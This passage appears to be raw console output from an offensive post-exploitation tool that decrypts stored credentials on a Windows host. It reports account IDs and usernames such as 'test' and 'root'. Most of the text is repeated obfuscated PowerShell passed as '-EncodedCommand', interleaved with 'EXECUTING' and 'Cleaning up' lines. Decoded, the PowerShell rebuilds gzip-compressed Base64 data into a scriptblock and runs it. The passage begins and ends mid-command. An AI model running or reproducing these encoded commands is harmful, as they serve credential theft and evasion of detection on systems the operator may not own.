ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBkAFMAdABEAHUARgBQAGUAJwA7AA== -InputFormat None
[*] Generated blank DPAPI blob AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAYYUf9giQJU6FsB/4oBAouwQAAAACAAAAAAAQZgAAAAEAACAAAAC4oJgVLLWN8sPkYy0doeQimsFGMvJ+uKpwlF4qBgB0egAAAAAOgAAAAAIAACAAAABjOc8Oc7ng8BkdbC6LRD0zW3AA3V29sfqnxOmZLuB+oBAAAACF7DtCK/ZPMrEkuNp6tdW2QAAAAESv7mx3Wx2bm94l6X2UHCBl9gveRi4FqKYRJIP+YbJSJ7bYCFk+a+9LrJqvd20sWUknPJUYhTxkXUp9fB3L6+Y=
[+] Compressed size: 2192
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUAeABlAHYARwBNAEMAQQB6AFcAUgB5AFcANgBEAE0AQgBDAEcAWAA0AFYARABwAFMAUwBpAEoAVwBrAHsAMgB9AHMAcAA2AE0AZwBZAFMAJwArACcAcwBKAEUAQgBXADkAVQBCAHQAbAAxAEEAQgBkAG8AMgBKAFEANQArACsAVwBlAGMAeQAwAHYAZgBQAE4AeABwAHAAQwBEAHAAUwBaAGMARgB6AHYARABWADkATQBBAEEAWQB2AC8AawBsAEkAOABvAGIAeQBIAE8AUwBmAGkAWABsAFAARQB5AEoANABwAFcANQBJAEsAbgBtAEUAVgBUAHcAVwBKAFMARABnADAALwBPAFEAcgBNAHkAUgBIAEcAYwBSAFoALwA5AFAAdgBDAGcANAAyAGgARABJAHsAMQB9AHoAQgBMADYAUgA2AGUASQA1AHEAawBKAGQATQAwAEkAaQBIADcARgBoAHEATABxAGUAQwBJAEUARwB3AEcAWQByAHcAbwBnAFUAWgB1ADUAUABxAEEAZABMAHMAUgBMAGkANABRAEoAdgBUADEAQQBoAHoAMABtADQAOQBsAGwAWABBAEUAZwBBAHcAaAA3AE0ATQBkAHcAMABiAFcANgB1AGYARQAnACsAJwBRAFgAUwAnACsAJwBxAHMATgBFAHoAWQAxAEwAQQBuAHsAMgB9ADcANABMAHMAWAB4AGMAdAB4ADAATABaAHoAbwA5ADYAaQBCAHEAQwBGAHYARQBvAEEAZwBuAHMAdAA5ADkARwAxAFcAUQA5AGkAYgBrADIAMwBZAEgANQBUAHgARwB1ADcARwBLAHAANAA5AG0AdQBzAHsAMQB9AGkAcABDACcAKwAnAFkAeQBuAHQAUABkAFAAMQAzADkAbABHAG4AMwA1AEkAbgBMAHMAZABlAGYATQBYAE4AeAAwADQAVAA3ACsASQBSADcAMwBGAGMATQBmADMASwBUAEEAVABGAEcAZQBVAFQAVQBZAC8AbABuAEQAQQBxAHsAMgB9AFMAMAB6AFMAYgArAG4AcwBGAE8AZwBNADUANABmACcAKwAnAGIANgBKAHIAUgBXAGIAeQB1ADcASgBRAFcAZgBUADEAVgBYADYAMwBxAHsAMQB9AGIAeQBlAEoAMgBvAGQAMwBZAEQAcAB1AHIAUAA4AHQAMwBrAHoAWABxAGQAVQA4ADcALwByADYAZABsADUATQBOACcAKwAnAGQAUABSAHUAUQBBAHIAMQB1AHoAbQB1ADEARgA2AFYAbAAzAG0AUgBKAEsAOQBLAFoAVQBwAFIAbQBNAHgAQwBkAEkAdwB6AFUAcQBuAFYAQgBnAHEANQBQAGwAQQBTAEMAUwAxAHYARgBQADAARAB4AE0AbwA5AEIAYwA0AEIAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcAagAnACwAJwBhACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBBAFAAegBaAFoAYwBqAGsAJwA7AA==
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUAeABlAHYARwBNAEMAQQB6AFcAUgB5AFcANgBEAE0AQgBDAEcAWAA0AFYARABwAFMAUwBpAEoAVwBrAHsAMgB9AHMAcAA2AE0AZwBZAFMAJwArACcAcwBKAEUAQgBXADkAVQBCAHQAbAAxAEEAQgBkAG8AMgBKAFEANQArACsAVwBlAGMAeQAwAHYAZgBQAE4AeABwAHAAQwBEAHAAUwBaAGMARgB6AHYARABWADkATQBBAEEAWQB2AC8AawBsAEkAOABvAGIAeQBIAE8AUwBmAGkAWABsAFAARQB5AEoANABwAFcANQBJAEsAbgBtAEUAVgBUAHcAVwBKAFMARABnADAALwBPAFEAcgBNAHkAUgBIAEcAYwBSAFoALwA5AFAAdgBDAGcANAAyAGgARABJAHsAMQB9AHoAQgBMADYAUgA2AGUASQA1AHEAawBKAGQATQAwAEkAaQBIADcARgBoAHEATABxAGUAQwBJAEUARwB3AEcAWQByAHcAbwBnAFUAWgB1ADUAUABxAEEAZABMAHMAUgBMAGkANABRAEoAdgBUADEAQQBoAHoAMABtADQAOQBsAGwAWABBAEUAZwBBAHcAaAA3AE0ATQBkAHcAMABiAFcANgB1AGYARQAnACsAJwBRAFgAUwAnACsAJwBxAHMATgBFAHoAWQAxAEwAQQBuAHsAMgB9ADcANABMAHMAWAB4AGMAdAB4ADAATABaAHoAbwA5ADYAaQBCAHEAQwBGAHYARQBvAEEAZwBuAHMAdAA5ADkARwAxAFcAUQA5AGkAYgBrADIAMwBZAEgANQBUAHgARwB1ADcARwBLAHAANAA5AG0AdQBzAHsAMQB9AGkAcABDACcAKwAnAFkAeQBuAHQAUABkAFAAMQAzADkAbABHAG4AMwA1AEkAbgBMAHMAZABlAGYATQBYAE4AeAAwADQAVAA3ACsASQBSADcAMwBGAGMATQBmADMASwBUAEEAVABGAEcAZQBVAFQAVQBZAC8AbABuAEQAQQBxAHsAMgB9AFMAMAB6AFMAYgArAG4AcwBGAE8AZwBNADUANABmACcAKwAnAGIANgBKAHIAUgBXAGIAeQB1ADcASgBRAFcAZgBUADEAVgBYADYAMwBxAHsAMQB9AGIAeQBlAEoAMgBvAGQAMwBZAEQAcAB1AHIAUAA4AHQAMwBrAHoAWABxAGQAVQA4ADcALwByADYAZABsADUATQBOACcAKwAnAGQAUABSAHUAUQBBAHIAMQB1AHoAbQB1ADEARgA2AFYAbAAzAG0AUgBKAEsAOQBLAFoAVQBwAFIAbQBNAHgAQwBkAEkAdwB6AFUAcQBuAFYAQgBnAHEANQBQAGwAQQBTAEMAUwAxAHYARgBQADAARAB4AE0AbwA5AEIAYwA0AEIAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcAagAnACwAJwBhACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBBAFAAegBaAFoAYwBqAGsAJwA7AA== -InputFormat None
[+] Cleaning up 1172
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUAOQBlAHYARwBNAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgBLADQAbQAxAHMAbgBKAFAATABVAEUAUwBDACcAKwAnAEUAcwBzAHkAawB4AE0AeQBrAGsAdAAxAGwAQQBQAEwAVQA0AHQAVQB0AGYAVQB5ADAANgB0AEwASwA0AEoAVABzADEASgBUAFMANwBSAEQAUwA0AHAAeQBzAHgATABWAHcAaABKAHoAOAAvAEsAUwBRAHEAdAByAEYARwB0AHsAMAB9AGsAWQAxAEwAQgB7ADEAfQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgB6AEcASQB1AHgAJwArACcASQBRAEEAQQBBAEEAPQAnACkALQBmACcAagAnACwAJwBpACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBBAFAAegBaAFoAYwBqAGsAJwA7AA== -InputFormat None
[!] ID D1D23890-7A8C-4F29-91B3-063EFF0A157F username 'test' decrypted Password nil, excluding
[+] Compressed size: 2184
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAQgBlAHYARwBNAEMAQQB7ADIAfQBXAFIAeQAzAEsAQwBRAEIAQgBGAGYANABWAEYAcQBvAHgARgBRAGkAcgBHAHcAaQBTAHUAQgBzAFEAbwBMADAAJwArACcAVQBrAHYAaQBvAEwAWQBKAG8AUgBBAHcAdwBNAE0AeABMADgAKwBxAGcAeAB2AGUAbQBxADAALwBmAGMAVAAnACsAJwBVAE8AOABwADkASQAyAGQAUgBQAG0AZgAwAGQARABoAFAASABqAHMAaQAxAEIAZQBrAFIAMQBEAFgAbQBVAHQAVwA2AFkAZwArAFMAMwBOAFkAZABjADgAUwBFAFcATABPAFgAdABjAEwAZQBFAEgANgA0AFkAUgBVAHgAeABXAHAAQwB2ADkAMwBmAGsANgA5AE8AcAA4AGcASABjADUAKwB4AE0AewAxAH0AbgAnACsAJwBmAC8AVQBVAFYAbgBiAGMAawBwAFkAVwBHADUAYgA1AFUANQBvAHgAeABpAEQAbgBnAFUAOAB2AEMAcwBCAFUAWAA1AFIAKwA1ADMATwBpADIATwB3AFAAZwBaAGoAaABuAE4AdABiAEEARwB0AFgAOAByADYAeQBBAFAASQBlAFQAcQBUAG8ARgBmAHQAVABFADIARgBvAGMASgBSAFkAMwB4AHAARwBkAHkAcgBaADAAdgBhAEwATQBKAGsAagBlAFMAZQBtAGEAZwBqAG0AdgB0AHEAVQA4ADEAUgBFAFYAewAyAH0AawBaAEMATwAvAHMAYgBiAGsAcwBzAHkAYgBrAFMAewAyAH0AVgBxADMAbgB5AEgAYQAwAGsAbwArADkAcABqAG4ATQB3ADEAUABnAE8AagBQAEIATgByAEQAdwBMAFcASABSAFEAeQBOAEsAdABRADMAaQBkAEgAQwB0AFEAYgBPAHIAagBxAFkAMwBmADEAUwBaAHEAVwBYAGIAVQBNADkAeABsAGQARQBKAGkAVABZAFYAVwBRAHMAaABWACcAKwAnADkAKwBXADAATABMACcAKwAnAFoAcABPAHIAbgAxAGkAcQBwAGUAZwA1AGkAKwAyAHQAKwBsAHYAZwAwAE0AbwAyAHQAUwBwAGEAdQByAGwAcABiAFcARgBmAFAAOQByAFgAYQBTAHMAeQBYAEYAZgBrAGMAeQBOADQAUABIAG8AdwBLAGYAUwBuAE0ARQByACsAYwBiAE0ASABFACcAKwAnAGkAVQArADkARQBlADMAbgBuAGUANgBEAGQATwBlAEsATABIAHUAUQBPAGoAYQBOAHcAOAB3AEoANAAzADEAYQBRAEsAZgBiAEgAVQBwAHcAZQBhAEMAYgBhAFAAaABBAEYAdQBZAHYALwB0AEMAewAxAH0AcQA4ADQAQgBBAEEAQQB7ADAAfQAnACkALQBmACcAPQAnACwAJwA3ACcALAAnAHoAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAE8AVABOAFAAcgBCAFcAUQAnADsA
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAQgBlAHYARwBNAEMAQQB7ADIAfQBXAFIAeQAzAEsAQwBRAEIAQgBGAGYANABWAEYAcQBvAHgARgBRAGkAcgBHAHcAaQBTAHUAQgBzAFEAbwBMADAAJwArACcAVQBrAHYAaQBvAEwAWQBKAG8AUgBBAHcAdwBNAE0AeABMADgAKwBxAGcAeAB2AGUAbQBxADAALwBmAGMAVAAnACsAJwBVAE8AOABwADkASQAyAGQAUgBQAG0AZgAwAGQARABoAFAASABqAHMAaQAxAEIAZQBrAFIAMQBEAFgAbQBVAHQAVwA2AFkAZwArAFMAMwBOAFkAZABjADgAUwBFAFcATABPAFgAdABjAEwAZQBFAEgANgA0AFkAUgBVAHgAeABXAHAAQwB2ADkAMwBmAGsANgA5AE8AcAA4AGcASABjADUAKwB4AE0AewAxAH0AbgAnACsAJwBmAC8AVQBVAFYAbgBiAGMAawBwAFkAVwBHADUAYgA1AFUANQBvAHgAeABpAEQAbgBnAFUAOAB2AEMAcwBCAFUAWAA1AFIAKwA1ADMATwBpADIATwB3AFAAZwBaAGoAaABuAE4AdABiAEEARwB0AFgAOAByADYAeQBBAFAASQBlAFQAcQBUAG8ARgBmAHQAVABFADIARgBvAGMASgBSAFkAMwB4AHAARwBkAHkAcgBaADAAdgBhAEwATQBKAGsAagBlAFMAZQBtAGEAZwBqAG0AdgB0AHEAVQA4ADEAUgBFAFYAewAyAH0AawBaAEMATwAvAHMAYgBiAGsAcwBzAHkAYgBrAFMAewAyAH0AVgBxADMAbgB5AEgAYQAwAGsAbwArADkAcABqAG4ATQB3ADEAUABnAE8AagBQAEIATgByAEQAdwBMAFcASABSAFEAeQBOAEsAdABRADMAaQBkAEgAQwB0AFEAYgBPAHIAagBxAFkAMwBmADEAUwBaAHEAVwBYAGIAVQBNADkAeABsAGQARQBKAGkAVABZAFYAVwBRAHMAaABWACcAKwAnADkAKwBXADAATABMACcAKwAnAFoAcABPAHIAbgAxAGkAcQBwAGUAZwA1AGkAKwAyAHQAKwBsAHYAZwAwAE0AbwAyAHQAUwBwAGEAdQByAGwAcABiAFcARgBmAFAAOQByAFgAYQBTAHMAeQBYAEYAZgBrAGMAeQBOADQAUABIAG8AdwBLAGYAUwBuAE0ARQByACsAYwBiAE0ASABFACcAKwAnAGkAVQArADkARQBlADMAbgBuAGUANgBEAGQATwBlAEsATABIAHUAUQBPAGoAYQBOAHcAOAB3AEoANAAzADEAYQBRAEsAZgBiAEgAVQBwAHcAZQBhAEMAYgBhAFAAaABBAEYAdQBZAHYALwB0AEMAewAxAH0AcQA4ADQAQgBBAEEAQQB7ADAAfQAnACkALQBmACcAPQAnACwAJwA3ACcALAAnAHoAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAE8AVABOAFAAcgBCAFcAUQAnADsA -InputFormat None
[+] Cleaning up 11284
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYATgBlAHYARwBNAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgBLADQAbQAxAHMAbgBKAFAATABVAEUAUwBDAEUAcwBzAHkAawB4AE0AeQBrAGsAdAAxAGwAQQBQACcAKwAnAEwAVQA0AHQAVQB0AGYAVQB5ADAANgB0AEwASwA0AEoAVABzADEASgBUAFMANwBSACcAKwAnAEQAUwA0AHAAeQBzAHgATABWADAAaAB4AHEAWABMAE4AQwBnADcAMwByAGwARwB0AHsAMQB9AGsAWQAxAEwAQgBpAHIAWQBSAG8AcQA4AFQAbwBxAGUAYQBVADUATwBUAHAAUQBRADIAcwBCAGcAZwBmAE4AegBJAFEAQQBBAEEAQQB7ADAAfQAnACkALQBmACcAPQAnACwAJwBqACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBPAFQATgBQAHIAQgBXAFEAJwA7AA== -InputFormat None
[!] ID 70275B03-E805-49E1-9535-1867C62371E2 username 'root' decrypted Password nil, excluding
[+] Compressed size: 2184
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAUgBlAHYARwBNAEMAQQB6AFcAJwArACcAUgB3AFgASwBDAE0AQgBSAEYAZgA0AFYARgBaADYAeABEAGkANQAwAHAAUQA3AFcAdQBFAGcAUQByAEMAcABZAGkAcgBlAEoAMABrAFkAWQBBADAAVQBBAGcAaQBRAHIAewAyAH0AKwBxAHAAdAAzACsAYgBOAG4ASABmAHsAMQB9ADMAVAB5AEMAQwA2ADUAVgBjAHYARwBXAE4AMwBRAHgAQgBtAGwANgB2ACsAcABxAG8AdAAwAEQASwBVAG4ANQB4AGIAbwBBAGwAVQBTAEwATwBxAGwASQBhAFUAUQBFAEgAdwBSAFYAMwBYAGkANwBJAHEAMAB5AG4AQQByAHoAbABGAGIANQA1AC8ATQB6AGkATwB6AFoAegBKAGcAUwBGAFMAbAB4AEoAcgBmAGIALwA2AGgAaABpADYANQBXAHsAMQB9AEIAZQBvAEwAagByAGoAVgBYAEIARgBzAEMATABwAEIAQwBsADAAMQB1AEsAcQAvAGkAVwAzAFcANQB0AFgAUgB5AEwAVQBHAGIAcQBDAGwAeABCAEoAWQBwAGwALwBaAFQAMABRAEEAZwBBAEMAMgA2AC8AUwBJAFgAUgBUADUAMgAzADMAdwBzAEgASgBHAGQAaABNAGwALwBCADgAQQBaAHQATgBuAEkAMQB5AEcAbgBxAHgANQBVAG8ANABNAEQAawBFAC8ASABDADYAUwBNAEEARwB2AHgATQBtACsAVwBVADUAZgB3AFMANgBrADYAdwBOAFIAbAA1AFkAZgA3AE0AdQBLAHsAMgB9AHAAMQBrACcAKwAnAHAAawB4AEcAMQBoADQATwBRAHcAOABPAEYASgBaAEMANQBPAEgAWABlAHIAVABaAFgAeQB0AEEAYwB1AHIARABtAGIALwAvAHQAeQBiAEoAaABVACsAJwArACcAdAB0AGcAYwA3AFIAcwBNAEgAdgBVAE8AVwAvAHIAaABtAEcAVAAyAHUALwA0AFMATgBhAFcAQwBlAEQAcgAwAHYAJwArACcAbgAxADMAMwAxADcAeQBFADgAOABFAEcAQQBRADAAMQBEAC8AMgA3AGoAeQBhAE8AYQArAGkAUQBiAHQAcgB7ADIAfQBmAHkASQBBACsAVQAvAEYAaQBoADMAbQA2AGYAZABnAHQAWABNAFgAYwBzADEAWAB5AGQARAB2AEoASABDAEsAaQBkADEAMwB1AHYAZgBhAFQAZgBCACcAKwAnAGcAYgBFADcAcgBiAGYAZwBHAEQARQBmADQAWQBKAFcAcABOAGYAdgBqAHoAVgB5AGUAZQBBAEsAVQBSADUAawBLAC8AbwBEAEkARwBiAEIAbwA4ADQAQgBBACcAKwAnAEEAQQB7ADAAfQAnACkALQBmACcAPQAnACwAJwBQACcALAAnADkAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAHUATwB2AFcAcgBuAGYAVwAnADsA
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAUgBlAHYARwBNAEMAQQB6AFcAJwArACcAUgB3AFgASwBDAE0AQgBSAEYAZgA0AFYARgBaADYAeABEAGkANQAwAHAAUQA3AFcAdQBFAGcAUQByAEMAcABZAGkAcgBlAEoAMABrAFkAWQBBADAAVQBBAGcAaQBRAHIAewAyAH0AKwBxAHAAdAAzACsAYgBOAG4ASABmAHsAMQB9ADMAVAB5AEMAQwA2ADUAVgBjAHYARwBXAE4AMwBRAHgAQgBtAGwANgB2ACsAcABxAG8AdAAwAEQASwBVAG4ANQB4AGIAbwBBAGwAVQBTAEwATwBxAGwASQBhAFUAUQBFAEgAdwBSAFYAMwBYAGkANwBJAHEAMAB5AG4AQQByAHoAbABGAGIANQA1AC8ATQB6AGkATwB6AFoAegBKAGcAUwBGAFMAbAB4AEoAcgBmAGIALwA2AGgAaABpADYANQBXAHsAMQB9AEIAZQBvAEwAagByAGoAVgBYAEIARgBzAEMATABwAEIAQwBsADAAMQB1AEsAcQAvAGkAVwAzAFcANQB0AFgAUgB5AEwAVQBHAGIAcQBDAGwAeABCAEoAWQBwAGwALwBaAFQAMABRAEEAZwBBAEMAMgA2AC8AUwBJAFgAUgBUADUAMgAzADMAdwBzAEgASgBHAGQAaABNAGwALwBCADgAQQBaAHQATgBuAEkAMQB5AEcAbgBxAHgANQBVAG8ANABNAEQAawBFAC8ASABDADYAUwBNAEEARwB2AHgATQBtACsAVwBVADUAZgB3AFMANgBrADYAdwBOAFIAbAA1AFkAZgA3AE0AdQBLAHsAMgB9AHAAMQBrACcAKwAnAHAAawB4AEcAMQBoADQATwBRAHcAOABPAEYASgBaAEMANQBPAEgAWABlAHIAVABaAFgAeQB0AEEAYwB1AHIARABtAGIALwAvAHQAeQBiAEoAaABVACsAJwArACcAdAB0AGcAYwA3AFIAcwBNAEgAdgBVAE8AVwAvAHIAaABtAEcAVAAyAHUALwA0AFMATgBhAFcAQwBlAEQAcgAwAHYAJwArACcAbgAxADMAMwAxADcAeQBFADgAOABFAEcAQQBRADAAMQBEAC8AMgA3AGoAeQBhAE8AYQArAGkAUQBiAHQAcgB7ADIAfQBmAHkASQBBACsAVQAvAEYAaQBoADMAbQA2AGYAZABnAHQAWABNAFgAYwBzADEAWAB5AGQARAB2AEoASABDAEsAaQBkADEAMwB1AHYAZgBhAFQAZgBCACcAKwAnAGcAYgBFADcAcgBiAGYAZwBHAEQARQBmADQAWQBKAFcAcABOAGYAdgBqAHoAVgB5AGUAZQBBAEsAVQBSADUAawBLAC8AbwBEAEkARwBiAEIAbwA4ADQAQgBBACcAKwAnAEEAQQB7ADAAfQAnACkALQBmACcAPQAnACwAJwBQACcALAAnADkAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8